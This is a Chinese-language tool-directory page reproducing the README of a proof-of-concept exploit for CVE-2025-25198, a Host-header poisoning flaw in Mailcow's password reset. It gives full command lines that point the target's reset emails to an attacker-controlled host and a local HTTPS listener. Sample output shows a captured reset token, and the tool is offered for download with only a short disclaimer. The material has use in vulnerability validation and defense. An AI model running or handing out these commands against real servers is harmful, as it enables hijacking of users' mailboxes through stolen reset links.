Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-25198-PoC — CVE-2025-25198 的 PoC:针对 Mailcow 的自动化 Host 头投毒测试 - HTTPS 监听器、自动 cookie/CSRF 处理、捕获首个重置链接。 | Kitploit
工具/GitHubGitHub/groppoxx/cve-2025-25198-poc
密码攻击漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubgroppoxx/cve-2025-25198-poc

CVE-2025-25198-PoC

CVE-2025-25198 的 PoC:针对 Mailcow 的自动化 Host 头投毒测试 - HTTPS 监听器、自动 cookie/CSRF 处理、捕获首个重置链接。

查看仓库
2013个月前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
网站

CVE-2025-25198-PoC

针对 CVE-2025-25198 的概念验证(PoC),该漏洞是一个影响 Mailcow 密码重置流程的 Host 头投毒问题。

该脚本会在 443 端口启动一个本地 HTTPS 监听器,自动获取有效的 CSRF 令牌,通过被投毒的 Host 头发送密码重置序列,并在从 HTTP 响应或监听器回调中恢复出重置链接时停止。

功能说明

  1. 启动一个使用自签名证书的 HTTPS 监听器。
  2. 创建一个全新的 HTTP 客户端会话。
  3. 自动获取 CSRF 令牌。
  4. 使用受控的 Host 头发送重置流程。
  5. 从响应和重定向中提取重置链接。
  6. 如果目标以带外方式发送链接,则等待监听器命中。
  7. 在第一个有效重置链接处停止,并清晰地打印出来。

环境要求

root@kitploit:~
Python 3.8+
OpenSSL in PATH
sudo/root privileges to bind port 443
Inbound TCP/443 reachable from the target

安装依赖:

root@kitploit:~
pip install -r requirements.txt

快速开始

尖括号中的值是占位符。请将它们替换为你自己的值,且不要包含 < 或 > 字符。

root@kitploit:~
sudo python3 cve_2025_25198.py \
  --listen-host 0.0.0.0 \
  --base-url <MAILCOW_URL> \
  --username <MAILBOX> \
  --attacker-host <ATTACKER_HOST> \
  --http2

占位符

root@kitploit:~
<MAILCOW_URL>    # Target Mailcow base URL. Example: https://mail.example.com
<MAILBOX>        # Mailbox/user passed to the reset form. Usually an email address.
<ATTACKER_HOST>  # IP or DNS name that the target can reach on TCP/443.

完整示例

root@kitploit:~
sudo python3 cve_2025_25198.py \
  --listen-host 0.0.0.0 \
  --base-url https://mail.cows.com \
  --username [email protected] \
  --attacker-host 10.10.13.12 \
  --http2

示例输出:

root@kitploit:~
[2026-05-17T18:30:12Z] [+] HTTPS listener on https://0.0.0.0:443
[2026-05-17T18:30:13Z] [+] Auto CSRF: 0123456789abcdef...
[2026-05-17T18:30:13Z] [>] Sending sequence with poisoned Host
[2026-05-17T18:30:14Z] [HIT] GET /reset-password?token=AAAA-BBBB-CCCC-DDDD ← 10.10.13.12 [200]

╔════════════════════════════════════════════════════════════════════════════════╗
║  RESET LINK FOUND!  (listener)                                                 ║
╟════════════════════════════════════════════════════════════════════════════════╢
║  https://mail.cows.com/reset-password?token=AAAA-BBBB-CCCC-DDDD                ║
║  Target: mail.cows.com                                                         ║
╚════════════════════════════════════════════════════════════════════════════════╝

演示

asciicast

可选参数

root@kitploit:~
--http2
   Use HTTP/2 via httpx. Recommended for best parity with modern browsers.

--interval <seconds>
   Seconds between attempts and listener wait windows. Default: 8

--max-attempts <N>
   Stop after N attempts. Default: 0, which means retry indefinitely.

--cookie '<pairs>'
   Seed the client cookie jar manually.
   Example: --cookie 'PHPSESSID=abcdef123456; another=value'

--csrf <TOKEN>
   Use a known CSRF token instead of auto-discovery.

--only-final
   Hide progress logs and print only the final reset-link banner.

注意事项

  • 监听器始终绑定到 443 端口。
  • 在 Linux/macOS 上,绑定 443 端口需要 sudo 或 root 权限。
  • 目标必须能够访问 https://<ATTACKER_HOST>/。
  • 如果在 HTTP 响应中发现重置链接,脚本将立即退出。
  • 如果在响应中未找到链接,脚本将等待 HTTPS 监听器收到回调。
  • 如果未恢复任何链接,该序列默认每 8 秒重试一次。
  • 如果 server.pem 和 server.key 不存在,则会自动生成。

法律声明

本 PoC 仅用于授权安全测试、实验室环境和漏洞验证。 未经明确许可,请勿将其用于任何系统。

下载工具